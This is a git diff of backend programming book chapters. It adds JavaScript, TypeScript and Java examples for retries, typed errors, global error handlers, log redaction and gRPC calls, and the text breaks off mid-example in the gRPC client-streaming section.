+      log.warn({ attempt: attempt + 1, wait_ms: wait, err }, 'retrying')
+    }
+  }
+  throw new Error(`all ${maxRetries} retries exhausted`)
+}
+
+function isRetryable(err: unknown): boolean {
+  // Retry on 429, 503, network errors; not on 400, 401, 422
+  if (err instanceof HTTPError) {
+    return err.statusCode === 429 || err.statusCode >= 500
+  }
+  return true // network errors are always retryable
+}
+
+// Usage: the result is still a Message, cache or no retries.
+const sent: Message = await withRetry(() => emailClient.send(to, subject, body))
+```
+
+```java title="EmailService.java / Java 17+ + Spring Retry"
+// Spring Retry collapses the whole loop into an annotation, and its
+// defaults are exactly the ones above: multiplier 2, plus a random
+// factor that supplies the jitter.
+@Service
+public class EmailService {
+
+    @Retryable(
+        retryFor   = RetryableException.class,  // 429, 5xx, network
+        noRetryFor = PermanentException.class,  // 400, 401, 422: never retry
+        maxAttempts = 5,
+        backoff = @Backoff(delay = 1000, multiplier = 2, random = true))
+    public void sendEmail(String to, String subject, String body) {
+        emailClient.send(to, subject, body); // 1s, 2s, 4s, 8s, 16s (+jitter)
+    }
+
+    // Called once every attempt is exhausted. Without a @Recover method
+    // the final exception simply propagates, which is often right, but
+    // that should be a decision rather than something you discover.
+    @Recover
+    void recover(RetryableException e, String to, String subject, String body) {
+        log.error("all retries exhausted to={}", to, e);
+        deadLetter.park(to, subject, body);
+    }
+}
+
+// Resilience4j is the other standard choice, and its advantage is that
+// the retry composes with a circuit breaker: a provider that is fully
+// down stops being called at all, instead of being retried five times
+// by every single request that arrives.
+```
+
 ### Automatic vs Manual Recovery
 
 - **Automatic**: restart crashed processes (systemd, Kubernetes restart policy), clean up corrupted caches, switch to backup systems. Design carefully, automatic recovery can sometimes _amplify_ a problem.
@@ -471,12 +1001,18 @@ The global error handler is a single middleware that sits at the outermost layer
 
 12
 
-## Go: Global Error Handler Implementation
+## Global Error Handler Implementation
 
-Go doesn't have exceptions, errors are return values. The pattern is to return errors up the call stack and handle them in middleware.
+The shape is the same in every language and splits in two: a **typed application error** that carries the status code and a safe, user-facing message, and a **single place** at the edge that turns anything thrown or returned into that envelope. Go has no exceptions, so its errors travel as return values; the others let an exception fly and catch it at the boundary. Either way, exactly one place decides what the client sees.
 
-```go
-Go / errors/types.gopackage apperr
+### The typed application error
+
+Go Python JavaScript TypeScript Java
+
+a status code, a safe message, and the original error kept for logs only
+
+```go title="errors/types.go / Go"
+package apperr
 
 import "net/http"
 
@@ -509,9 +1045,141 @@ func Internal(err error) *AppError {
 }
 ```
 
-```go
-Go / middleware/error_handler.gopackage middleware
+```python title="errors.py / Python"
+class AppError(Exception):
+    """The canonical error type for this application."""
 
+    def __init__(self, status: int, message: str, details=None, cause=None):
+        super().__init__(message)
+        self.status = status      # HTTP status code
+        self.message = message    # Safe, user-facing message
+        self.details = details    # Optional: field-level errors for 400s
+        self.cause = cause        # Original error, for logging only
+
+
+class NotFoundError(AppError):
+    def __init__(self, resource: str):
+        super().__init__(404, f"{resource} not found")
+
+
+class ConflictError(AppError):
+    def __init__(self, msg: str):
+        super().__init__(409, msg)
+
+
+class BadRequestError(AppError):
+    def __init__(self, msg: str, details=None):
+        super().__init__(400, msg, details)
+
+
+class InternalError(AppError):
+    def __init__(self, cause: Exception):
+        # NEVER put str(cause) in `message`, it reaches the client
+        super().__init__(500, "something went wrong", cause=cause)
+```
+
+```js title="errors.js / Node 20+"
+// The canonical error type for this application.
+export class AppError extends Error {
+  constructor(code, message, details, cause) {
+    super(message, { cause }) // `cause` is for logging only, NEVER sent out
+    this.name = 'AppError'
+    this.code = code          // HTTP status code
+    this.details = details    // Optional: field-level errors for 400s
+  }
+}
+
+// Constructors
+export const notFound = (resource) => new AppError(404, `${resource} not found`)
+export const conflict = (msg) => new AppError(409, msg)
+export const badRequest = (msg, details) => new AppError(400, msg, details)
+export const internal = (cause) =>
+  new AppError(500, 'something went wrong', undefined, cause)
+//                  ^ NEVER cause.message here: it leaks the stack, the
+//                    SQL, and often the schema straight to the client.
+```
+
+```ts title="errors.ts / TypeScript 5+"
+interface FieldError {
+  field: string
+  issue: string
+}
+
+export class AppError extends Error {
+  constructor(
+    readonly code: number,          // HTTP status code
+    override readonly message: string, // safe, user-facing
+    readonly details?: FieldError[], // field-level errors for 400s
+    override readonly cause?: unknown, // original error, LOGGING ONLY
+  ) {
+    super(message, { cause })
+    this.name = 'AppError'
+  }
+}
+
+// The separation the types are enforcing is the security one from sec 14:
+// `message` and `details` are the only fields the handler is allowed to
+// serialise, and `cause` is deliberately typed `unknown` so nobody can
+// casually interpolate it into a response without narrowing it first.
+export const notFound = (resource: string): AppError =>
+  new AppError(404, `${resource} not found`)
+
+export const conflict = (msg: string): AppError => new AppError(409, msg)
+
+export const badRequest = (msg: string, details?: FieldError[]): AppError =>
+  new AppError(400, msg, details)
+
+export const internal = (cause: unknown): AppError =>
+  new AppError(500, 'something went wrong', undefined, cause)
+```
+
+```java title="AppException.java / Java 17+"
+// The canonical error type for this application.
+public class AppException extends RuntimeException {
+    private final int code;              // HTTP status code
+    private final Object details;        // Optional: field-level errors for 400s
+
+    public AppException(int code, String message, Object details, Throwable cause) {
+        super(message, cause);           // cause is for logging only
+        this.code = code;
+        this.details = details;
+    }
+
+    public int code() { return code; }
+    public Object details() { return details; }
+
+    // Factories, so a status code is never typed as a bare int at a call site
+    public static AppException notFound(String resource) {
+        return new AppException(404, resource + " not found", null, null);
+    }
+
+    public static AppException conflict(String msg) {
+        return new AppException(409, msg, null, null);
+    }
+
+    public static AppException badRequest(String msg, Object details) {
+        return new AppException(400, msg, details, null);
+    }
+
+    public static AppException internal(Throwable cause) {
+        // NEVER cause.getMessage() as the message: it reaches the client
+        return new AppException(500, "something went wrong", null, cause);
+    }
+}
+
+// Extending RuntimeException, not Exception, is deliberate: a checked
+// exception would force every layer in between to declare or wrap it,
+// which is exactly the ceremony that makes people swallow errors.
+```
+
+### The handler at the edge
+
+Go Python JavaScript TypeScript Java
+
+one place that maps any failure to the envelope, and logs the rest
+
+```go title="middleware/error_handler.go / Go"
+package middleware
 import (
     "encoding/json"
     "errors"
@@ -577,33 +1245,14 @@ func isPgError(err error, code string) bool {
 }
 ```
 
-13
-
-## Python: Global Error Handler (FastAPI)
-
-```python
-Python / FastAPIfrom fastapi import FastAPI, Request
+```python title="main.py / Python + FastAPI"
+from fastapi import FastAPI, Request
 from fastapi.responses import JSONResponse
 from psycopg2 import errors as pg_errors
 import logging
 
 app = FastAPI()
 logger = logging.getLogger("app")
-
-# --- Custom exception types ---
-class AppError(Exception):
-    def __init__(self, status: int, message: str, details=None):
-        self.status  = status
-        self.message = message
-        self.details = details
-
-class NotFoundError(AppError):
-    def __init__(self, resource: str):
-        super().__init__(404, f"{resource} not found")
-
-class ConflictError(AppError):
-    def __init__(self, msg: str):
-        super().__init__(409, msg)
 
 # --- Global exception handlers ---
 @app.exception_handler(AppError)
@@ -631,6 +1280,137 @@ async def unhandled_error_handler(request: Request, exc: Exception):
         extra={"path": request.url.path})
     return JSONResponse(status_code=500,
         content={"code": 500, "message": "something went wrong"})
+```
+
+```js title="middleware/errorHandler.js / Node 20+ + Express"
+import { AppError, conflict, notFound, internal } from '../errors.js'
+
+// Express identifies an error handler by its FOUR parameters. Drop `next`
+// and it silently becomes an ordinary middleware that is never called on
+// an error, which is the classic way this safety net stops working.
+export function globalErrorHandler(err, req, res, next) {
+  let appErr
+
+  if (err instanceof AppError) {
+    // Already wrapped
+    if (err.cause) log.error({ err: err.cause }, 'app error')
+    appErr = err
+  } else if (err.code === '23505') {
+    // Postgres unique constraint violation -> 409
+    appErr = conflict('resource already exists')
+  } else if (err.code === '23503') {
+    // Postgres foreign key violation -> 404
+    appErr = notFound('referenced resource')
+  } else {
+    // Everything else -> 500 (never leak internal error)
+    log.error({ err, path: req.path }, 'unhandled error')
+    appErr = internal(err)
+  }
+
+  res.status(appErr.code).json({
+    code: appErr.code,
+    message: appErr.message,
+    ...(appErr.details && { details: appErr.details }),
+  })
+}
+
+// Registered LAST, after every route, because Express runs the chain in
+// order and an error handler can only catch what is upstream of it.
+app.use(globalErrorHandler)
+
+// An async handler that rejects does NOT reach here on Express 4; wrap
+// it, or use Express 5, which forwards rejected promises for you.
+```
+
+```ts title="middleware/errorHandler.ts / TypeScript 5+ + Express"
+import type { NextFunction, Request, Response } from 'express'
+import { AppError, conflict, notFound, internal } from '../errors'
+
+// Postgres surfaces its errors as a `code` string on an untyped object,
+// so narrowing it is the honest first step rather than a cast.
+function pgCode(err: unknown): string | undefined {
+  return typeof err === 'object' && err !== null && 'code' in err
+    ? String((err as { code: unknown }).code)
+    : undefined
+}
+
+export function globalErrorHandler(
+  err: unknown, // `unknown`, not `Error`: anything at all can be thrown
+  req: Request,
+  res: Response,
+  _next: NextFunction,
+): void {
+  let appErr: AppError
+
+  if (err instanceof AppError) {
+    if (err.cause) log.error({ err: err.cause }, 'app error')
+    appErr = err
+  } else {
+    switch (pgCode(err)) {
+      case '23505': appErr = conflict('resource already exists'); break  // unique violation
+      case '23503': appErr = notFound('referenced resource'); break      // FK violation
+      default:
+        log.error({ err, path: req.path }, 'unhandled error')
+        appErr = internal(err) // never leak the original message
+    }
+  }
+
+  res.status(appErr.code).json({
+    code: appErr.code,
+    message: appErr.message,
+    ...(appErr.details && { details: appErr.details }),
+  })
+}
+```
+
+```java title="GlobalExceptionHandler.java / Java 17+ + Spring Boot"
+// @RestControllerAdvice IS the global handler: one class, applied to
+// every controller, with a method per exception type. Spring picks the
+// most specific match, so the Exception method is the final net.
+@RestControllerAdvice
+public class GlobalExceptionHandler {
+    private static final Logger log = LoggerFactory.getLogger(GlobalExceptionHandler.class);
+
+    record ErrorResponse(int code, String message, Object details) {}
+
+    // Already wrapped as AppException
+    @ExceptionHandler(AppException.class)
+    ResponseEntity<ErrorResponse> onApp(AppException e) {
+        if (e.getCause() != null) {
+            log.error("app error", e.getCause()); // the real error, internally
+        }
+        return ResponseEntity.status(e.code())
+            .body(new ErrorResponse(e.code(), e.getMessage(), e.details()));
+    }
+
+    // Postgres unique constraint violation -> 409
+    @ExceptionHandler(DuplicateKeyException.class)
+    ResponseEntity<ErrorResponse> onDuplicate() {
+        return ResponseEntity.status(409)
+            .body(new ErrorResponse(409, "resource already exists", null));
+    }
+
+    // Foreign key / referenced row missing -> 404
+    @ExceptionHandler(DataIntegrityViolationException.class)
+    ResponseEntity<ErrorResponse> onIntegrity() {
+        return ResponseEntity.status(404)
+            .body(new ErrorResponse(404, "referenced resource not found", null));
+    }
+
+    // Everything else -> 500, and the real error goes to the log ONLY.
+    @ExceptionHandler(Exception.class)
+    ResponseEntity<ErrorResponse> onUnhandled(Exception e, HttpServletRequest req) {
+        log.error("unhandled error path={}", req.getRequestURI(), e);
+        return ResponseEntity.status(500)
+            .body(new ErrorResponse(500, "something went wrong", null));
+    }
+}
+
+// Turn OFF the default error attributes, or Spring's own /error page can
+// hand back the exception message and a stack trace, undoing all of this:
+//   server.error.include-message: never
+//   server.error.include-stacktrace: never
+//   server.error.include-binding-errors: never
 ```
 
 14
@@ -666,10 +1446,14 @@ Logs are often shipped to third-party aggregation services (Datadog, Grafana Clo
 
 - **Never log**: passwords, API keys, credit card numbers, SSNs, full email addresses, session tokens.
 - **Log instead**: user ID (not email), correlation/request ID, operation name, error code.
-- Use a **log scrubbing library** (e.g. Go: `slog` with custom handler; Python: `structlog` processors) to automatically redact known sensitive fields.
+- Use a **log scrubbing library** (Go: `slog` with a custom handler; Python: `structlog` processors; Node: pino's `redact`; Java: a Logback `RegexReplacement`) to automatically redact known sensitive fields.
 
-```text
-Go / safe vs unsafe logging//UNSAFE, never do this
+Go Python JavaScript TypeScript Java
+
+log the identifier, never the identity
+
+```go title="safe_logging.go / Go + log/slog"
+// UNSAFE, never do this
 slog.Error("login_failed",
     "email", user.Email,          // PII leak
     "password", req.Password,     // catastrophic
@@ -682,6 +1466,116 @@ slog.Error("login_failed",
     "correlation_id", r.Header.Get("X-Request-ID"),
     "reason", "invalid_credentials",  // generic code, not DB message
 )
+```
+
+```python title="safe_logging.py / Python + structlog"
+# UNSAFE, never do this
+log.error("login_failed",
+    email=user.email,           # PII leak
+    password=req.password,      # catastrophic
+    api_key=cfg.openai_key,     # secret leak
+)
+
+# SAFE, IDs and correlation only
+log.error("login_failed",
+    user_id=user.id,
+    correlation_id=request.headers.get("X-Request-ID"),
+    reason="invalid_credentials",  # generic code, not DB message
+)
+
+# Better still: make the leak impossible rather than remembering not to
+# do it. A structlog processor scrubs known-sensitive keys on every
+# event, including the ones a future call site adds carelessly.
+SENSITIVE = {"password", "api_key", "token", "card", "email"}
+
+def scrub(logger, method_name, event_dict):
+    for key in event_dict:
+        if key.lower() in SENSITIVE:
+            event_dict[key] = "[REDACTED]"
+    return event_dict
+
+structlog.configure(processors=[scrub, ...])
+```
+
+```js title="safeLogging.js / Node 20+ + pino"
+// UNSAFE, never do this
+log.error({
+  email: user.email,          // PII leak
+  password: req.body.password, // catastrophic
+  api_key: config.openaiKey,   // secret leak
+}, 'login_failed')
+
+// SAFE, IDs and correlation only
+log.error({
+  user_id: user.id,
+  correlation_id: req.get('X-Request-ID'),
+  reason: 'invalid_credentials', // generic code, not DB message
+}, 'login_failed')
+
+// Best: configure redaction ONCE, so the unsafe version above is
+// neutralised even when somebody writes it by accident.
+const log = pino({
+  redact: {
+    paths: ['*.password', '*.api_key', '*.token', '*.card', 'req.headers.authorization'],
+    censor: '[REDACTED]',
+  },
+})
+
+// Note what redaction does NOT cover: `log.error(user)` where the whole
+// object is logged, or an error whose MESSAGE contains the token. The
+// list is a safety net, not a substitute for choosing the fields.
+```
+
+```ts title="safeLogging.ts / TypeScript 5+ + pino"
+// Redaction is a runtime safety net. TypeScript can add a compile-time
+// one on top, which catches the mistake before it ever ships.
+type Sensitive = 'password' | 'email' | 'api_key' | 'token' | 'card'
+
+// A log payload that simply cannot carry a sensitive key: the mapped
+// type sets each of them to `never`, so supplying one fails to compile.
+type SafeLog = Record<string, unknown> & { [K in Sensitive]?: never }
+
+export function logSafely(event: string, fields: SafeLog): void {
+  log.error(fields, event)
+}
+
+// SAFE, IDs and correlation only
+logSafely('login_failed', {
+  user_id: user.id,
+  correlation_id: req.get('X-Request-ID'),
+  reason: 'invalid_credentials', // generic code, not DB message
+})
+
+// UNSAFE, and this one is now a BUILD failure rather than a breach:
+// logSafely('login_failed', { email: user.email, password: req.body.password })
+```
+
+```java title="SafeLogging.java / Java 17+ + SLF4J"
+// UNSAFE, never do this
+log.error("login_failed email={} password={} api_key={}",
+    user.email(), req.password(), config.openAiKey());
+
+// SAFE, IDs and correlation only
+log.atError()
+   .setMessage("login_failed")
+   .addKeyValue("user_id", user.id())
+   .addKeyValue("correlation_id", req.getHeader("X-Request-ID"))
+   .addKeyValue("reason", "invalid_credentials") // generic code, not DB message
+   .log();
+
+// Java's structural guard is `toString()`: a record prints ALL of its
+// components, so logging a User record logs the password field with it.
+// Override it once, at the type, and every log site is safe by default.
+public record User(String id, String email, String passwordHash) {
+    @Override
+    public String toString() {
+        return "User[id=" + id + "]"; // no email, no hash, ever
+    }
+}
+
+// Logback can also mask at the appender with a RegexReplacement rule,
+// which catches secrets embedded in exception messages, the case no
+// field-level approach can reach.
 ```
 
 <Callout type="info">
@@ -698,4 +1592,4 @@ Follow the [OWASP Authentication Cheat Sheet](https://cheatsheetseries.owasp.org
 
 Backend Field Manual / Error Handling & Fault Tolerance / Chapter 16
 
-Backend from First Principles / Chapter 12 / Errors. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 12 / Errors. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/13-grpc-and-inter-service-communication.mdx
+++ b/src/content/chapters/13-grpc-and-inter-service-communication.mdx
@@ -2,7 +2,7 @@
 order: 13
 title: "gRPC & Inter-Service Communication"
 navTitle: "gRPC & Inter-Service Communication"
-summary: "A first-principles walkthrough of the RPC framework that powers the internals of Google, Netflix, Uber and most modern microservice fleets, from the contract (Protocol Buffers) and the binary wire format , through the HTTP/2 transport and the four streaming shapes, to deadlines, interceptors, mTLS and production resilience. Written to explain not just what each piece does but why it exists and how it works underneath. Implementations in both Go and Python."
+summary: "A first-principles walkthrough of the RPC framework that powers the internals of Google, Netflix, Uber and most modern microservice fleets, from the contract (Protocol Buffers) and the binary wire format , through the HTTP/2 transport and the four streaming shapes, to deadlines, interceptors, mTLS and production resilience. Written to explain not just what each piece does but why it exists and how it works underneath. Implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "3-4 hours"
 keywords:
   - "grpc"
@@ -85,6 +85,8 @@ syntax = "proto3";              // always declare the syntax; proto3 is current
 package user.v1;                // namespace + a versioning convention (v1, v2...)
 
 option go_package = "example.com/gen/userv1;userv1";  // where generated Go lands
+option java_package = "com.example.gen.userv1";      // and where generated Java lands
+option java_multiple_files = true;                   // one class per message, not one giant outer class
 
 // A message is a typed record. Each FIELD has a type, a name, and a NUMBER.
 message User {
@@ -188,7 +190,7 @@ Part III / The Four Call Types
 
 ## Unary RPC
 
-The simplest and most common shape: **one request, one response**: exactly like a normal function call. The client sends a single message, the server does its work and returns a single message. \~90% of real-world RPCs are unary. We'll build the `GetUser` method from the `user.proto` in sec 04, in full, both languages.
+The simplest and most common shape: **one request, one response**: exactly like a normal function call. The client sends a single message, the server does its work and returns a single message. \~90% of real-world RPCs are unary. We'll build the `GetUser` method from the `user.proto` in sec 04, in full, in all five languages.
 
 <Diagram caption="Unary">
 <svg viewBox="0 0 720 130" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Client sends one request, server returns one response"><rect x="40" y="20" width="150" height="40" rx="8" fill="var(--dg-accent)"></rect><text x="115" y="45" font-size="13" font-weight="700" fill="var(--dg-on-accent)" text-anchor="middle">Client</text><rect x="530" y="20" width="150" height="40" rx="8" fill="var(--dg-ok)"></rect><text x="605" y="45" font-size="13" font-weight="700" fill="var(--dg-on-accent)" text-anchor="middle">Server</text><defs><marker id="u1" markerWidth="9" markerHeight="9" refX="7" refY="3" orient="auto"><path d="M0 0 L7 3 L0 6 Z" fill="var(--dg-accent)"></path></marker><marker id="u2" markerWidth="9" markerHeight="9" refX="7" refY="3" orient="auto"><path d="M0 0 L7 3 L0 6 Z" fill="var(--dg-ok)"></path></marker></defs><path d="M195 40 H525" stroke="var(--dg-accent)" stroke-width="2" marker-end="url(#u1)"></path><text x="360" y="32" class="mono" font-size="11" fill="var(--dg-accent-2)" text-anchor="middle">1 request</text><path d="M525 75 H195" stroke="var(--dg-ok)" stroke-width="2" stroke-dasharray="5 3" marker-end="url(#u2)"></path><text x="360" y="98" class="mono" font-size="11" fill="var(--dg-ok)" text-anchor="middle">1 response</text></svg>
@@ -196,7 +198,7 @@ The simplest and most common shape: **one request, one response**: exactly like 
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 // ===== SERVER =====
@@ -294,6 +296,174 @@ if __name__ == "__main__":
     serve()
 ```
 
+```js
+// ===== SERVER =====
+const grpc = require('@grpc/grpc-js')
+const protoLoader = require('@grpc/proto-loader')
+
+// Node is the odd one out: it loads the .proto at RUNTIME instead of
+// generating source ahead of time. Same contract, later moment, nothing
+// about the shape is checked until the process starts.
+const def = protoLoader.loadSync('user.proto', { longs: String, enums: String })
+const { user } = grpc.loadPackageDefinition(def)
+
+// The method name and its (call, callback) shape come FROM the proto.
+function getUser(call, callback) {
+  if (!call.request.id) {
+    // typed error, sec 14
+    return callback({ code: grpc.status.INVALID_ARGUMENT, message: 'id is required' })
+  }
+  // ...real work: query the DB by call.request.id...
+  callback(null, {
+    user: {
+      id: call.request.id,
+      email: 'ada@example.com',
+      fullName: 'Ada',      // proto's full_name arrives camelCased
+      role: 'ROLE_ADMIN',
+    },
+  })
+}
+
+const server = new grpc.Server()
+server.addService(user.v1.UserService.service, { getUser }) // wire impl to service
+server.bindAsync('0.0.0.0:50051', grpc.ServerCredentials.createInsecure(), () => {
+  console.log('gRPC on :50051') // insecure creds for local dev only
+})
+
+// ===== CLIENT =====
+function callGetUser() {
+  const client = new user.v1.UserService(
+    'localhost:50051',
+    grpc.credentials.createInsecure(),
+  )
+
+  const deadline = new Date(Date.now() + 1000) // always a deadline, sec 13
+  client.getUser({ id: 'u42' }, { deadline }, (err, resp) => {
+    if (err) {
+      // err.code carries the gRPC status code
+      return console.error('GetUser failed:', err.code, err.details)
+    }
+    console.log('got user:', resp.user.fullName)
+  })
+}
+```
+
+```ts
+// ===== SERVER =====
+import * as grpc from '@grpc/grpc-js'
+// ts-proto turns user.proto into real TypeScript at BUILD time, and that
+// is the whole reason to prefer it to runtime loading: the compiler now
+// knows GetUserRequest has an `id` and nothing else, so a typo in a field
+// name fails the build instead of silently sending undefined.
+import {
+  UserServiceService,
+  UserServiceClient,
+  Role,
+  type UserServiceServer,
+  type GetUserResponse,
+} from './gen/user'
+
+const userService: UserServiceServer = {
+  // The signature is generated FROM the proto: (call, callback)
+  getUser(call, callback): void {
+    if (!call.request.id) {
+      callback({ code: grpc.status.INVALID_ARGUMENT, message: 'id is required' })
+      return // typed error, sec 14
+    }
+    // ...real work: query the DB by call.request.id...
+    const response: GetUserResponse = {
+      user: {
+        id: call.request.id,
+        email: 'ada@example.com',
+        fullName: 'Ada',
+        role: Role.ROLE_ADMIN, // a real enum member, not the string
+        tags: [],
+        createdAt: 0,
+      },
+    }
+    callback(null, response)
+  },
+}
+
+const server = new grpc.Server()
+server.addService(UserServiceService, userService) // wire impl to service
+server.bindAsync('0.0.0.0:50051', grpc.ServerCredentials.createInsecure(), () => {
+  console.log('gRPC on :50051')
+})
+
+// ===== CLIENT =====
+// grpc-js is callback-based. Promisify it once, here, so that every call
+// site downstream can just await the RPC like any other async function.
+const client = new UserServiceClient('localhost:50051', grpc.credentials.createInsecure())
+
+export function getUser(id: string): Promise<GetUserResponse> {
+  return new Promise((resolve, reject) => {
+    const deadline = new Date(Date.now() + 1000) // always a deadline, sec 13
+    client.getUser({ id }, { deadline }, (err, resp) => {
+      if (err) reject(err) // err carries the gRPC status code
+      else resolve(resp)
+    })
+  })
+}
+```
+
+```java
+// ===== SERVER =====
+// protoc-gen-grpc-java emits UserServiceGrpc with a base class to extend.
+// Note the shape: the response goes to a StreamObserver instead of being
+// returned, which is why unary and streaming look nearly identical here.
+public class UserServiceImpl extends UserServiceGrpc.UserServiceImplBase {
+
+    @Override
+    public void getUser(GetUserRequest req,
+                        StreamObserver<GetUserResponse> responseObserver) {
+        if (req.getId().isEmpty()) {
+            responseObserver.onError(Status.INVALID_ARGUMENT
+                .withDescription("id is required")
+                .asRuntimeException()); // typed error, sec 14
+            return;
+        }
+
+        // ...real work: query the DB by req.getId()...
+        User u = User.newBuilder()
+            .setId(req.getId())
+            .setEmail("ada@example.com")
+            .setFullName("Ada")
+            .setRole(Role.ROLE_ADMIN)
+            .build();
+
+        responseObserver.onNext(GetUserResponse.newBuilder().setUser(u).build());
+        // onCompleted() IS the OK trailer. Forget it and the client hangs
+        // until its deadline, with no error to explain why.
+        responseObserver.onCompleted();
+    }
+}
+
+Server server = ServerBuilder.forPort(50051)
+    .addService(new UserServiceImpl()) // wire the impl to the service
+    .build()
+    .start();
+System.out.println("gRPC on :50051");
+
+// ===== CLIENT =====
+// usePlaintext() is the insecure-credentials equivalent: local dev only.
+ManagedChannel channel = ManagedChannelBuilder.forAddress("localhost", 50051)
+    .usePlaintext()
+    .build();
+
+// The BLOCKING stub is the generated one that reads like a local call.
+UserServiceGrpc.UserServiceBlockingStub client = UserServiceGrpc.newBlockingStub(channel)
+    .withDeadlineAfter(1, TimeUnit.SECONDS); // always a deadline, sec 13
+
+try {
+    GetUserResponse resp = client.getUser(
+        GetUserRequest.newBuilder().setId("u42").build()); // looks local, runs remote
+    System.out.println("got user: " + resp.getUser().getFullName());
+} catch (StatusRuntimeException e) {
+    System.err.println("GetUser failed: " + e.getStatus().getCode());
+}
+```
+
 Notice the symmetry across languages: a generated _stub_ on the client, a generated _servicer/server_ base class on the server, and a method whose exact signature came from the proto.
 
 ## Server Streaming
@@ -306,7 +476,7 @@ Notice the symmetry across languages: a generated _stub_ on the client, a genera
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 // proto:  rpc ListUsers(ListUsersRequest) returns (stream User);
@@ -352,7 +522,81 @@ def list_users(stub):
         print("user:", u.full_name)
 ```
 
-Go uses an explicit `stream.Send`/`stream.Recv` pair; Python expresses the server side as a _generator_ (`yield`) and the client side as a plain _iterable_, idiomatic to each language, same wire behavior.
+```js
+// proto:  rpc ListUsers(ListUsersRequest) returns (stream User);
+
+// ===== SERVER: `call` IS a writable stream; write() per message =====
+function listUsers(call) {
+  for (const u of queryUsers(call.request.filter)) { // imagine a big result set
+    call.write(u) // push one message down the stream
+  }
+  call.end() // ending the stream closes it cleanly (sends the OK trailer)
+}
+
+// ===== CLIENT: the call is a readable stream; listen for 'data' =====
+function listUsersClient(client) {
+  const deadline = new Date(Date.now() + 10_000)
+  const call = client.listUsers({ filter: 'active' }, { deadline })
+
+  call.on('data', (u) => console.log('user:', u.fullName))
+  call.on('end', () => console.log('done')) // server closed the stream
+  call.on('error', (err) => console.error(err))
+}
+```
+
+```ts
+// proto:  rpc ListUsers(ListUsersRequest) returns (stream User);
+
+// ===== SERVER: the call object is a typed writable stream =====
+const userService: UserServiceServer = {
+  listUsers(call: ServerWritableStream<ListUsersRequest, User>): void {
+    for (const u of queryUsers(call.request.filter)) {
+      call.write(u) // push one message down the stream
+    }
+    call.end() // closes the stream cleanly
+  },
+}
+
+// ===== CLIENT: `for await` instead of an 'data' handler =====
+// A grpc-js call is an async iterable, and that is worth using rather
+// than .on('data'): an event handler fires whether or not you are ready
+// for the next message, while `for await` only pulls the next one when
+// the loop body has finished, which is real back-pressure.
+async function listUsers(client: UserServiceClient): Promise<void> {
+  const deadline = new Date(Date.now() + 10_000)
+  const call = client.listUsers({ filter: 'active' }, { deadline })
+
+  for await (const u of call as AsyncIterable<User>) {
+    console.log('user:', u.fullName)
+  }
+}
+```
+
+```java
+// proto:  rpc ListUsers(ListUsersRequest) returns (stream User);
+
+// ===== SERVER: onNext() repeatedly, then onCompleted() once =====
+@Override
+public void listUsers(ListUsersRequest req, StreamObserver<User> responseObserver) {
+    for (User u : queryUsers(req.getFilter())) { // imagine a big result set
+        responseObserver.onNext(u); // push one message down the stream
+    }
+    responseObserver.onCompleted(); // closes the stream cleanly (OK trailer)
+}
+
+// ===== CLIENT: the blocking stub hands back an ITERATOR =====
+UserServiceBlockingStub client = UserServiceGrpc.newBlockingStub(channel)
+    .withDeadlineAfter(10, TimeUnit.SECONDS);
+
+Iterator<User> users = client.listUsers(
+    ListUsersRequest.newBuilder().setFilter("active").build());
+
+while (users.hasNext()) { // iterate until the server closes the stream
+    System.out.println("user: " + users.next().getFullName());
+}
+```
+
+Each language reaches for the streaming idiom it already has: Go an explicit `stream.Send`/`stream.Recv` pair, Python a _generator_ (`yield`) on the server and an _iterable_ on the client, Node a readable stream (or an async iterable), Java a `StreamObserver` whose `onNext` is called once per message. Five spellings, identical bytes on the wire.
 
 ## Client Streaming
 
@@ -364,7 +608,7 @@ Go uses an explicit `stream.Send`/`stream.Recv` pair; Python expresses the serve
 
 ______
 
-● Go● Python
+● Go● Python● JavaScript● TypeScript● Java
 
 ```go
 // proto:  rpc UploadEvents(stream Event) returns (UploadSummary);
@@ -418,6 +662,121 @@ def upload_events(stub, events):
     print("server received", summary.received, "events")
 ```
 
+```js
+// proto:  rpc UploadEvents(stream Event) returns (UploadSummary);
+
+// ===== SERVER: `call` is readable; reply once via the callback =====
+function uploadEvents(call, callback) {
+  let count = 0
+  call.on('data', (ev) => {
+    store(ev)
+    count++
+  })
+  call.on('end', () => callback(null, { received: count })) // client done, reply once
+  call.on('error', (err) => callback(err))
+}
+
+// ===== CLIENT: write() many, then end(); the callback gets the reply =====
+function uploadEventsClient(client, events) {
+  const deadline = new Date(Date.now() + 30_000)
+  const call = client.uploadEvents({ deadline }, (err, summary) => {
+    if (err) return console.error(err)
+    console.log('server received', summary.received, 'events')
+  })
+
+  for (const ev of events) {
+    call.write(ev) // push each one up
+  }
+  call.end() // close our side; the callback above fires with the summary
+}
+```
+
+```ts
+// proto:  rpc UploadEvents(stream Event) returns (UploadSummary);
+
+// ===== SERVER: a typed readable stream + a single callback =====
+const userService: UserServiceServer = {
+  uploadEvents(
+    call: ServerReadableStream<Event, UploadSummary>,
+    callback: sendUnaryData<UploadSummary>,
+  ): void {
+    let count = 0
+    call.on('data', (ev: Event) => {
+      store(ev)
+      count++
+    })
+    call.on('end', () => callback(null, { received: count }))
+  },
+}
+
+// ===== CLIENT: promisified, because the reply arrives in a callback =====
+// Worth noticing what the Promise buys beyond ergonomics: it forces the
+// two failure paths, a stream error and a call error, into one rejection,
+// so a caller cannot await the upload and miss a mid-stream failure.
+function uploadEvents(client: UserServiceClient, events: Event[]): Promise<UploadSummary> {
+  return new Promise((resolve, reject) => {
+    const deadline = new Date(Date.now() + 30_000)
+    const call = client.uploadEvents({ deadline }, (err, summary) => {
+      if (err) reject(err)
+      else resolve(summary)
+    })
+    call.on('error', reject)
+
+    for (const ev of events) call.write(ev)
+    call.end() // close our side, await the summary
+  })
+}
+```
+
+```java
+// proto:  rpc UploadEvents(stream Event) returns (UploadSummary);
+
+// ===== SERVER: RETURN an observer; the client's messages arrive on it =====
+@Override
+public StreamObserver<Event> uploadEvents(StreamObserver<UploadSummary> responseObserver) {
+    // The inversion here is the one thing to get used to in Java: the
+    // parameter is where you WRITE, and the return value is where the
+    // client's messages are READ.
+    return new StreamObserver<Event>() {
